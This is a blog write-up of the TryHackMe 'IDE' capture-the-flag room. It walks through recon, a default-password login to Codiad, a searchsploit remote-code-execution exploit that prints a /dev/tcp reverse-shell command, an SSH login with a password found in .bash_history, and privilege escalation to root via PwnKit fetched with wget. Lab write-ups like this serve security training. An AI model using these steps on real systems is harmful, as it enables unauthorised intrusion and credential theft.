<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe writeup: IDE</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe writeup: IDE</h1>
</header>
<section data-field="subtitle" class="p-summary">
Sometimes in hacking, the recon and enumeration phase is overlooked. Here, I hope to show that enumeration is just as important.
</section>
<section data-field="body" class="e-content">
<section name="ec15" class="section section--body section--first section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="56ae" id="56ae" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: IDE</h3><p name="0f43" id="0f43" class="graf graf--p graf-after--h3">TryHackMe published a room called <em class="markup--em markup--p-em">IDE</em>, which describes itself as “an easy box to polish your enumeration skills” (<a href="https://tryhackme.com/room/ide" data-href="https://tryhackme.com/room/ide" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“bluestorm” and “403Exploit”, 2021</a>). This room does indeed put your reconnaissance and enumeration skills to the test — requiring that the student probes every nook-and-cranny regarding what can be accessed publicly or without credentials. In this room, I will describe my procedure to obtain the necessary flags on this boot2root system.</p><figure name="17b5" id="17b5" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*n1PnYOPn6hjnMxSuh3JIqA.png" data-width="1039" data-height="617" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*n1PnYOPn6hjnMxSuh3JIqA.png"><figcaption class="imageCaption">Base Image: <a href="https://www.denofgeek.com/tv/how-veronica-mars-transcended-its-many-genres/" data-href="https://www.denofgeek.com/tv/how-veronica-mars-transcended-its-many-genres/" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">Preece (2019)</a></figcaption></figure><h3 name="8813" id="8813" class="graf graf--h3 graf-after--figure">Procedure</h3><p name="73c0" id="73c0" class="graf graf--p graf-after--h3">First, I must establish the two objectives for this capture the flag: the first is to obtain a <code class="markup--code markup--p-code">user.txt</code> flag with user-level permissions and then to obtain a <code class="markup--code markup--p-code">root.txt</code> flag with root-level permissions. With the problem set up, I can now proceed to executing my attack.</p><h4 name="1104" id="1104" class="graf graf--h4 graf-after--p">Initial probing</h4><p name="5685" id="5685" class="graf graf--p graf-after--h4">As with these TryHackMe boot2root virtual machines, I clicked on the green-coloured button on the upper-right part of the first task to “get the ball rolling.” I proceeded to probe the system with an <code class="markup--code markup--p-code">nmap</code> scan with the following flags:</p><pre name="075a" id="075a" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─</strong><code class="markup--code markup--pre-code"><strong class="markup--strong markup--pre-strong">$ nmap -sT -v -Pn -p- -O -oX tcp_scan.xml &lt;boot2root ip&gt;</strong></code></pre><p name="1127" id="1127" class="graf graf--p graf-after--pre">The results of the <code class="markup--code markup--p-code">nmap</code> scan showed some interesting ports on the system (Fig. 1): an FTP service on port 21, an SSH service on port 22, a web server on port 80 and a mysterious service on port 62337.</p><figure name="35be" id="35be" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*rjjsWc7MqTx0qEMqzhCqtQ.png" data-width="992" data-height="488" src="https://cdn-images-1.medium.com/max/800/1*rjjsWc7MqTx0qEMqzhCqtQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 1: nmap results.</strong></figcaption></figure><p name="1492" id="1492" class="graf graf--p graf-after--figure"><code class="markup--code markup--p-code">nmap</code> also identified the probable operating system to be running Linux 3.1. My next step in initial probing was to look through the web server. I used my browser to visit the website’s home page and was greeted with the default page for Apache2 web servers (Fig. 2).</p><figure name="9190" id="9190" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*P8WQ6_pB81paxzdlLH7ddA.png" data-width="825" data-height="687" src="https://cdn-images-1.medium.com/max/800/1*P8WQ6_pB81paxzdlLH7ddA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 2: The boot2root machine’s default page.</strong></figcaption></figure><p name="c359" id="c359" class="graf graf--p graf-after--figure">Perhaps the web server had a hidden directory? I then ran <code class="markup--code markup--p-code">gobuster</code> (<a href="https://github.com/OJ/gobuster" data-href="https://github.com/OJ/gobuster" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Mehlmauer and “hytalo-bassi”, n.d.</a>) against the web server on my AttackBox:</p><pre name="8c8b" id="8c8b" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ gobuster dir -u http://&lt;boot2root ip&gt;/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt </strong><br>===============================================================<br>Gobuster v3.1.0<br>by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)<br>===============================================================<br>[+] Url: http://&lt;boot2root ip&gt;/<br>[+] Method: GET<br>[+] Threads: 10<br>[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt<br>[+] Negative Status codes: 404<br>[+] User Agent: gobuster/3.1.0<br>[+] Timeout: 10s<br>===================================================================<br>[redacted] Starting gobuster in directory enumeration mode<br>===================================================================</pre><p name="2734" id="2734" class="graf graf--p graf-after--pre">While <code class="markup--code markup--p-code">gobuster</code> was running in the background, I converted the XML output of the <code class="markup--code markup--p-code">nmap</code> scan into a readable HTML format (Fig. 1) and then browsed the FTP server as an anonymous user:</p><pre name="2ea4" id="2ea4" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ ftp &lt;boot2root ip&gt;</strong><br>Connected to &lt;boot2root ip&gt;.<br>220 (vsFTPd 3.0.3)<br>Name (&lt;boot2root ip&gt;:[redacted]): <strong class="markup--strong markup--pre-strong">anonymous</strong><br>331 Please specify the password. <br>Password: <strong class="markup--strong markup--pre-strong">[no password]</strong><br>230 Login successful.<br>Remote system type is UNIX.<br>Using binary mode to transfer files.<br><strong class="markup--strong markup--pre-strong">ftp&gt; ls</strong><br>229 Entering Extended Passive Mode (|||59871|)<br>150 Here comes the directory listing.<br>226 Directory send OK.</pre><p name="0ccf" id="0ccf" class="graf graf--p graf-after--pre">It seems like there is nothing interesting on the FTP server, so I then decided to check out the mysterious service on the 62337 port. I got my web browser to visit the service, and got the following (Fig. 3):</p><figure name="84ea" id="84ea" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*9Zju0-ogk5_3SoUbtswlHw.png" data-width="1117" data-height="796" src="https://cdn-images-1.medium.com/max/800/1*9Zju0-ogk5_3SoUbtswlHw.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 3: The “mysterious” service on port 62337.</strong></figcaption></figure><p name="a6c2" id="a6c2" class="graf graf--p graf-after--figure">Judging from the title generated by the <code class="markup--code markup--p-code">&lt;title&gt;</code> HTML tag, this service is running a piece of software called <a href="http://codiad.com/" data-href="http://codiad.com/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Codiad (n.d.)</a>, which is a “web-based IDE framework with a small footprint and minimal requirements.” The particular version of the web-based IDE is <code class="markup--code markup--p-code">2.8.4</code>, and searching for an exploit with <code class="markup--code markup--p-code">searchsploit</code> reveals the following remote command execution exploits:</p><pre name="0128" id="0128" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ searchsploit codiad</strong></pre><pre name="70cf" id="70cf" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="f46d" id="f46d" class="graf graf--pre graf-after--pre">Codiad 2.8.4 — Remote Code Execution (Authenticated) | multiple/webapps/49705.py<br> Codiad 2.8.4 — Remote Code Execution (Authenticated) (2) | multiple/webapps/49902.py<br> Codiad 2.8.4 — Remote Code Execution (Authenticated) (3) | multiple/webapps/49907.py<br> Codiad 2.8.4 — Remote Code Execution (Authenticated) (4) | multiple/webapps/50474.txt</pre><pre name="aeb2" id="aeb2" class="graf graf--pre graf-after--pre">[... snip ...]</pre><p name="13ad" id="13ad" class="graf graf--p graf-after--pre">Unfortunately these exploits require credentials. Furthermore, <code class="markup--code markup--p-code">gobuster</code> found no hidden directories (and just spat out error messages):</p><pre name="de0b" id="de0b" class="graf graf--pre graf-after--p">[ERROR] [redacted] [!] Get &quot;http://&lt;boot2root ip&gt;/5585&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)<br>[ERROR] [redacted] [!] Get &quot;http://&lt;boot2root ip&gt;/000648&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)<br>[ERROR] [redacted] [!] Get &quot;http://&lt;boot2root ip&gt;/zihack&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)</pre><pre name="957d" id="957d" class="graf graf--pre graf-after--pre">/server-status (Status: 403) [Size: 275]<br> <br>===============================================================<br>[redacted] Finished<br>===============================================================</pre><p name="d608" id="d608" class="graf graf--p graf-after--pre">I then turned my attention to the FTP server (again) and tried harder regarding the enumeration of whatever could be downloaded from the system:</p><pre name="7466" id="7466" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ ftp &lt;boot2root ip&gt;</strong><br>Connected to &lt;boot2root ip&gt;.<br>220 (vsFTPd 3.0.3)<br>Name (&lt;boot2root ip&gt;:[redacted]): <strong class="markup--strong markup--pre-strong">anonymous</strong><br>331 Please specify the password.<br>Password: <strong class="markup--strong markup--pre-strong">[no password]</strong><br>230 Login successful.<br>Remote system type is UNIX.<br>Using binary mode to transfer files.<br><strong class="markup--strong markup--pre-strong">ftp&gt; ls -la</strong><br>229 Entering Extended Passive Mode (|||42675|)<br>150 Here comes the directory listing.<br>drwxr-xr-x 3 0 114 4096 Jun 18 2021 .<br>drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..<br>drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...<br>226 Directory send OK.<br><strong class="markup--strong markup--pre-strong">ftp&gt; cd ...</strong><br>250 Directory successfully changed.<br><strong class="markup--strong markup--pre-strong">ftp&gt; ls -la</strong><br>229 Entering Extended Passive Mode (|||49004|)<br>150 Here comes the directory listing.<br>-rw-r-r-- 1 0 0 151 Jun 18 2021 -<br>drwxr-xr-x 2 0 0 4096 Jun 18 2021 .<br>drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..<br>226 Directory send OK.<br><strong class="markup--strong markup--pre-strong">ftp&gt; get &quot;-&quot;</strong><br>[... snip ...]<br>226 Transfer complete.<br>151 bytes received in [redacted]<br><strong class="markup--strong markup--pre-strong">ftp&gt;</strong></pre><p name="8991" id="8991" class="graf graf--p graf-after--pre">Running <code class="markup--code markup--p-code">ls -la</code> on the root directory showed a directory called “…”, which I then changed to and then ran the <code class="markup--code markup--p-code">ls -la</code> command again. Running it revealed that there is a file called “-” on the system, which I then proceeded to download to my AttackBox. The following contents were on the “-” file:</p><pre name="790f" id="790f" class="graf graf--pre graf-after--p">Hey john,<br>I have reset the password as you have asked. Please use the default password to login. <br>Also, please take care of the image file ;)<br>- drac.</pre><p name="b8fc" id="b8fc" class="graf graf--p graf-after--pre">I have learnt three important facts here: there is a user called <code class="markup--code markup--p-code">john</code> on the system, there is another user called <code class="markup--code markup--p-code">drac</code> on the system and that some kind of service is using the “default password.”</p><p name="cfb7" id="cfb7" class="graf graf--p graf-after--p">Referencing the room’s name, I presumed that this default password was on the Codio web application running on the 62337 port. I tried a number of default password, worked out that the combination to log into the application is <code class="markup--code markup--p-code">john:password</code> and was able to log into the application (Fig. 4):</p><figure name="e430" id="e430" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*pWCxZlH3yKWV4JY0RSqo8g.png" data-width="1173" data-height="787" src="https://cdn-images-1.medium.com/max/800/1*pWCxZlH3yKWV4JY0RSqo8g.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 4: The Codiad Application</strong></figcaption></figure><p name="6f08" id="6f08" class="graf graf--p graf-after--figure">I briefly looked at the project, and guessing from the filenames and a cursory reading of the code, this appears to be some kind of video streaming application. But now that I have valid credentials to get into a Codiad account, I can proceed to exploitation.</p><h4 name="d915" id="d915" class="graf graf--h4 graf-after--p">Exploitation</h4><p name="3836" id="3836" class="graf graf--p graf-after--h4">With a valid Codiad login at hand, I can now proceed to configure and weaponise a Codiad exploit. I decided to use the <code class="markup--code markup--p-code">49705.py</code> proof of concept offered by <code class="markup--code markup--p-code">searchsploit</code> — first by opening up a netcat listener and then launching the exploit:</p><pre name="7f07" id="7f07" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ python3 49705.py http://&lt;boot2root ip&gt;:62337/ john password &lt;attackbox ip&gt; 4445</strong><br>[+] Please execute the following command on your vps: <br>echo &#39;bash -c &quot;bash -i &gt;/dev/tcp/&lt;boot2root ip&gt;/4445 0&gt;&amp;1 2&gt;&amp;1&quot;&#39; | </pre><pre name="b68d" id="b68d" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="ad0a" id="ad0a" class="graf graf--pre graf-after--pre">[+] Please confirm that you have done the two command above [y/n]<br>[Y/n] <strong class="markup--strong markup--pre-strong">Y</strong><br>[+] Starting...<br>[+] Login Content : {&quot;status&quot;:&quot;success&quot;,&quot;data&quot;:{&quot;username&quot;:&quot;john&quot;}}<br>[+] Login success!<br>[+] Getting writeable path…<br>[+] Path Content : {&quot;status&quot;:&quot;success&quot;,&quot;data&quot;:{&quot;name&quot;:&quot;CloudCall&quot;,&quot;path&quot;:&quot;\/var\/www\/html\/codiad_projects&quot;}}<br>[+] Writeable Path : /var/www/html/codiad_projects<br>[+] Sending payload...</pre><p name="e8c2" id="e8c2" class="graf graf--p graf-after--pre">After launching the exploit, I get a shell onto the target system:</p><pre name="6698" id="6698" class="graf graf--pre graf-after--p">connect to [&lt;attackbox ip&gt;] from (UNKNOWN) [&lt;boot2root ip&gt;] 52940<br>bash: cannot set terminal process group (921): Inappropriate ioctl for device<br>bash: no job control in this shell<br><strong class="markup--strong markup--pre-strong">www-data@ide:/var/www/html/codiad/components/filemanager$ id</strong><br>id<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)</pre><h4 name="3568" id="3568" class="graf graf--h4 graf-after--pre">Post-exploitation</h4><p name="9485" id="9485" class="graf graf--p graf-after--h4">With a shell, I tried to get the <code class="markup--code markup--p-code">user.txt</code> flag — but sadly could not because I did not have the needed read permissions:</p><pre name="43b1" id="43b1" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">www-data@ide:/var/www/html/codiad/components/filemanager$ find / -name user.txt -type f -print 2&gt;/dev/null</strong><br>&lt;r$ find / -name user.txt -type f -print 2&gt;/dev/null <br>/home/drac/user.txt<br><strong class="markup--strong markup--pre-strong">www-data@ide:/var/www/html/codiad/components/filemanager$ cat /home/drac/user.txt</strong><br>&lt;iad/components/filemanager$ cat /home/drac/user.txt <br>cat: /home/drac/user.txt: Permission denied</pre><p name="c186" id="c186" class="graf graf--p graf-after--pre">So, I got a directory listing of what kind of files that I can read from the <code class="markup--code markup--p-code">drac</code> user account with <code class="markup--code markup--p-code">ls -la</code></p><pre name="b202" id="b202" class="graf graf--pre graf-after--p">total 52<br> drwxr-xr-x 6 drac drac 4096 Aug 4 2021 .<br> drwxr-xr-x 3 root root 4096 Jun 17 2021 ..<br> -rw------- 1 drac drac 49 Jun 18 2021 .Xauthority<br> -rw-r--r-- 1 drac drac 36 Jul 11 2021 .bash_history<br> -rw-r--r-- 1 drac drac 220 Apr 4 2018 .bash_logout<br> -rw-r--r-- 1 drac drac 3787 Jul 11 2021 .bashrc<br> drwx------ 4 drac drac 4096 Jun 18 2021 .cache<br> drwxr-x--- 3 drac drac 4096 Jun 18 2021 .config<br> drwx------ 4 drac drac 4096 Jun 18 2021 .gnupg<br> drwx------ 3 drac drac 4096 Jun 18 2021 .local<br> -rw-r--r-- 1 drac drac 807 Apr 4 2018 .profile<br> -rw-r--r-- 1 drac drac 0 Jun 17 2021 .sudo_as_admin_successful<br> -rw------- 1 drac drac 557 Jun 18 2021 .xsession-errors<br> -r-------- 1 drac drac 33 Jun 18 2021 user.txt</pre><p name="4ca2" id="4ca2" class="graf graf--p graf-after--pre">With the <code class="markup--code markup--p-code">www-data</code> account, I was able to read four files: <code class="markup--code markup--p-code">.bash_history</code>, <code class="markup--code markup--p-code">.bash_logout</code>, <code class="markup--code markup--p-code">.bashrc</code>, <code class="markup--code markup--p-code">.profile</code> and <code class="markup--code markup--p-code">.sudo_as_admin_successful</code>. I then use Python to setup a miniature HTTP service to transfer the readable files onto my AttackBox and then examined their contents with <code class="markup--code markup--p-code">cat</code>. <code class="markup--code markup--p-code">.bash_history</code> had an important piece of information:</p><pre name="3ba8" id="3ba8" class="graf graf--pre graf-after--p">mysql -u drac -p &#39;Th3dRaCULa1sR3aL&#39;</pre><p name="32c7" id="32c7" class="graf graf--p graf-after--pre">It seems like the <code class="markup--code markup--p-code">drac</code> user was connecting to some MySQL instance and is reusing their username. They may also be reusing their password, so I decided to log into the <code class="markup--code markup--p-code">drac</code> account via SSH using the MySQL password, and…</p><pre name="267a" id="267a" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ ssh drac@&lt;boot2root ip&gt; </strong><br>The authenticity of host &#39;&lt;boot2root ip&gt; (&lt;boot2root ip&gt;)&#39; can’t be established.<br>ED25519 key fingerprint is SHA256:74/tt/begRRzOOEOmVr2W3VX96tjC2aHyfqOEFUOkRk.<br>This key is not known by any other names<br>Are you sure you want to continue connecting (yes/no/[fingerprint])? <strong class="markup--strong markup--pre-strong">yes</strong><br>Warning: Permanently added &#39;&lt;boot2root ip&gt;&#39; (ED25519) to the list of known hosts.<br>drac@&lt;boot2root ip&gt;’s password: <strong class="markup--strong markup--pre-strong">[Th3dRaCULa1sR3aL]</strong><br>Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0–147-generic x86_64)</pre><pre name="7dae" id="7dae" class="graf graf--pre graf-after--pre">* Documentation: https://help.ubuntu.com<br> * Management: https://landscape.canonical.com<br> * Support: https://ubuntu.com/advantage</pre><pre name="4cc1" id="4cc1" class="graf graf--pre graf-after--pre">System information as of [redacted]</pre><pre name="4566" id="4566" class="graf graf--pre graf-after--pre">System load: 0.08 Processes: 101<br> Usage of /: 49.9% of 8.79GB Users logged in: 0<br> Memory usage: 16% IP address for eth0: &lt;boot2root ip&gt;<br> Swap usage: 0%</pre><pre name="b1ad" id="b1ad" class="graf graf--pre graf-after--pre">* Canonical Livepatch is available for installation.<br> — Reduce system reboots and improve kernel security. Activate at:<br> https://ubuntu.com/livepatch</pre><pre name="73a0" id="73a0" class="graf graf--pre graf-after--pre">69 packages can be updated.<br>1 update is a security update.</pre><pre name="fbca" id="fbca" class="graf graf--pre graf-after--pre">Last login: [redacted]<br><strong class="markup--strong markup--pre-strong">drac@ide:~$</strong></pre><p name="1192" id="1192" class="graf graf--p graf-after--pre">With the same file permissions that <code class="markup--code markup--p-code">drac</code> has, I can now read the <code class="markup--code markup--p-code">user.txt</code> file:</p><pre name="9e4c" id="9e4c" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">drac@ide:~$ cat user.txt<br></strong>[redacted]</pre><p name="4195" id="4195" class="graf graf--p graf-after--pre">The next step is to get the <code class="markup--code markup--p-code">root.txt</code> flag, which can be accomplished by exploiting privilege escalation bugs in the boot2root system. I first downloaded the <em class="markup--em markup--p-em">Linux Smart Enumeration script</em> (<a href="https://github.com/diego-treitos/linux-smart-enumeration" data-href="https://github.com/diego-treitos/linux-smart-enumeration" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Blanco, n.d.</a>) onto the boot2root system and then ran it to find potential candidates for rooting the system.</p><pre name="02e0" id="02e0" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">drac@ide:~$ ./lse.sh</strong><br>-----<br>If you know the current user password, write it here to check sudo privileges: <strong class="markup--strong markup--pre-strong">Th3dRaCULa1sR3aL</strong> <br>-----<br> <br> LSE Version: 4.2nw</pre><pre name="47bb" id="47bb" class="graf graf--pre graf-after--pre">User: drac<br> User ID: 1000<br> Password: ******<br> Home: /home/drac<br> Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin<br> umask: 0002</pre><pre name="7616" id="7616" class="graf graf--pre graf-after--pre">Hostname: ide<br> Linux: 4.15.0–147-generic<br>Distribution: Ubuntu 18.04.5 LTS<br>Architecture: x86_64</pre><pre name="a4f0" id="a4f0" class="graf graf--pre graf-after--pre">======================( humanity )=========================<br>[!] nowar0 Should we question autocrats and their &quot;military operations&quot;?... yes!</pre><pre name="fa5b" id="fa5b" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="0efe" id="0efe" class="graf graf--pre graf-after--pre">[!] cve-2021-3560 Checking for policykit vulnerability..................... nope<br>[!] cve-2021-4034 Checking for PwnKit <strong class="markup--strong markup--pre-strong"># Interesting Exploit</strong> vulnerability........................ yes!<br>---<br>Vulnerable!<br>---<br>[!] cve-2022-0847 Dirty Pipe <strong class="markup--strong markup--pre-strong"># Interesting Exploit</strong> vulnerability................................. yes!<br>---<br>4.15.0-147-generic<br>---</pre><pre name="f75d" id="f75d" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="3660" id="3660" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">drac@ide:~$</strong></pre><p name="c5c9" id="c5c9" class="graf graf--p graf-after--pre">After failing to root the system with through Dirty Pipe vulnerability (<a href="https://dirtypipe.cm4all.com/" data-href="https://dirtypipe.cm4all.com/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Kellermann, 2022</a>), I then decided to use the PwnKit vulnerability complete with a compiled and working exploit devised by <a href="https://github.com/ly4k/PwnKit" data-href="https://github.com/ly4k/PwnKit" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Lyak (n.d.)</a> to automatically drop myself onto a root shell:</p><pre name="4c89" id="4c89" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">drac@ide:~$ wget http://&lt;attackbox ip&gt;:8888/exploits/PwnKit</strong><br>-- [redacted] --  http://&lt;attackbox ip&gt;:8888/exploits/PwnKit<br>Connecting to &lt;attackbox ip&gt;:8888... connected.<br>HTTP request sent, awaiting response... 200 OK<br>Length: 14688 (14K) [application/octet-stream]<br>Saving to: &#39;PwnKit&#39;</pre><pre name="872c" id="872c" class="graf graf--pre graf-after--pre">PwnKit 100%[============================================================&gt;] [redacted] in 0.1s</pre><pre name="6743" id="6743" class="graf graf--pre graf-after--pre">[redacted] (131 KB/s) — &#39;PwnKit&#39; saved [14688/14688]</pre><pre name="8cf9" id="8cf9" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">drac@ide:~$ ls -l PwnKit</strong><br>-rw-rw-r-- 1 drac drac 14688 [redacted] PwnKit<br><strong class="markup--strong markup--pre-strong">drac@ide:~$ chmod +x PwnKit</strong><br><strong class="markup--strong markup--pre-strong">drac@ide:~$ ./PwnKit</strong><br>To run a command as administrator (user &quot;root&quot;), use &quot;sudo &lt;command&gt;&quot;.<br>See &quot;man sudo_root&quot; for details.</pre><pre name="47ba" id="47ba" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">root@ide:/home/drac#</strong></pre><p name="633d" id="633d" class="graf graf--p graf-after--pre">All that is left is to dump the <code class="markup--code markup--p-code">root.txt</code> file:</p><pre name="f15b" id="f15b" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">root@ide:/home/drac# cat /root/root.txt<br></strong>[redacted]</pre><p name="f544" id="f544" class="graf graf--p graf-after--pre">Allora.</p><h3 name="143d" id="143d" class="graf graf--h3 graf-after--p">Conclusion</h3><p name="ce66" id="ce66" class="graf graf--p graf-after--h3">The IDE room was pretty fun! It was fairly easy in terms of technical skill needed to execute the attacks, but it forces the student to really exercise their enumeration and probing skills. It goes to show that extensive probing of a target system can lead to some kind of crack — as even the finest system administrators are fallible, ergo leading to a bad actor getting access.</p><h4 name="d756" id="d756" class="graf graf--h4 graf-after--p">Takeaways</h4><ul class="postList"><li name="59c4" id="59c4" class="graf graf--li graf-after--h4">When performing a professional penetration test, be sure to scan all the ports on the target systems. This can be accomplished by adding the <code class="markup--code markup--li-code">-p-</code> flag on <code class="markup--code markup--li-code">nmap</code>.</li><li name="5dfe" id="5dfe" class="graf graf--li graf-after--li">Also, if one has anonymous read access to an FTP server, be sure to enumerate all the directories with the <code class="markup--code markup--li-code">ls -la</code> command, as seemingly useless files can be a “key into the kingdom.”</li><li name="af63" id="af63" class="graf graf--li graf-after--li">The web server on port 80 might not be easily exploitable — or might just have a default web page on it.</li><li name="58b0" id="58b0" class="graf graf--li graf-after--li">Be sure to read or download any files where one has read permissions on the remote target system. The <code class="markup--code markup--li-code">.bash_history</code> file supplied me with a password that I was able to reuse when logging into the <code class="markup--code markup--li-code">drac</code> account via an SSH service.</li><li name="38e4" id="38e4" class="graf graf--li graf-after--li">If one privilege escalation exploit is failing for whatever reason, you can always try another one ;-)</li></ul><h4 name="935e" id="935e" class="graf graf--h4 graf-after--li">Plug</h4><p name="7034" id="7034" class="graf graf--p graf-after--h4">Check out my friend Mira Lazine who, along with other associates, needs financial and emotional help. Check out the following links:</p><ul class="postList"><li name="625b" id="625b" class="graf graf--li graf-after--p">Her Twitter profile: <a href="https://twitter.com/MiraLazine" data-href="https://twitter.com/MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://twitter.com/MiraLazine</a></li><li name="7f43" id="7f43" class="graf graf--li graf-after--li">Her Medium profile: <a href="https://medium.com/@MiraLazine" data-href="https://medium.com/@MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener" target="_blank">https://medium.com/@MiraLazine</a></li><li name="cdb2" id="cdb2" class="graf graf--li graf-after--li">Donate to herself on Cash.App: <a href="https://cash.app/$MiraLazine" data-href="https://cash.app/$MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://cash.app/$MiraLazine</a></li></ul><h3 name="507d" id="507d" class="graf graf--h3 graf-after--li">References</h3><p name="a11c" id="a11c" class="graf graf--p graf-after--h3">Blanco, D. (n.d.). <em class="markup--em markup--p-em">Linux Smart Enumeration</em>. GitHub Repository. Retrieved on Mar. 28, 2022 from: <a href="https://github.com/diego-treitos/linux-smart-enumeration" data-href="https://github.com/diego-treitos/linux-smart-enumeration" class="markup--anchor markup--p-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://github.com/diego-treitos/linux-smart-enumeration</a></p><p name="16f6" id="16f6" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“bluestorm” and “403Exploit” (2021). <em class="markup--em markup--p-em">IDE</em>. TryHackMe. Retrieved on Mar. 28, 2022 from: <a href="https://tryhackme.com/room/ide" data-href="https://tryhackme.com/room/ide" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://tryhackme.com/room/ide</a></p><p name="ed81" id="ed81" class="graf graf--p graf-after--p">Codiad (n.d.). Retrieved on Mar. 27, 2022 from: <a href="http://codiad.com/" data-href="http://codiad.com/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">http://codiad.com/</a></p><p name="08e6" id="08e6" class="graf graf--p graf-after--p">Kellermann, M. (c.a. 2022). <em class="markup--em markup--p-em">The Dirty Pipe Vulnerability documentation</em>. Retrieved on Mar. 28, 2022: <a href="https://dirtypipe.cm4all.com/" data-href="https://dirtypipe.cm4all.com/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://dirtypipe.cm4all.com/</a></p><p name="ace2" id="ace2" class="graf graf--p graf-after--p">Lyak, O. (n.d.). <em class="markup--em markup--p-em">PwnKit</em>. GitHub Repository. Retrieved on Mar. 28, 2022 from: <a href="https://github.com/ly4k/PwnKit" data-href="https://github.com/ly4k/PwnKit" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/ly4k/PwnKit</a></p><p name="6f84" id="6f84" class="graf graf--p graf-after--p">Mehlmauer, C. and “hytalo-bassi” (n.d.). <em class="markup--em markup--p-em">gobuster</em>. GitHub Repository. Retrieved on Mar. 27, 2022 from: <a href="https://github.com/OJ/gobuster" data-href="https://github.com/OJ/gobuster" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/OJ/gobuster</a></p><p name="fb43" id="fb43" class="graf graf--p graf-after--p graf--trailing">Preece, C. (2019). <em class="markup--em markup--p-em">How Veronica Mars Transcended Its Many Genres</em>. Den of Geek. Retrieved on Mar. 28, 2022 from: <a href="https://www.denofgeek.com/tv/how-veronica-mars-transcended-its-many-genres/" data-href="https://www.denofgeek.com/tv/how-veronica-mars-transcended-its-many-genres/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" 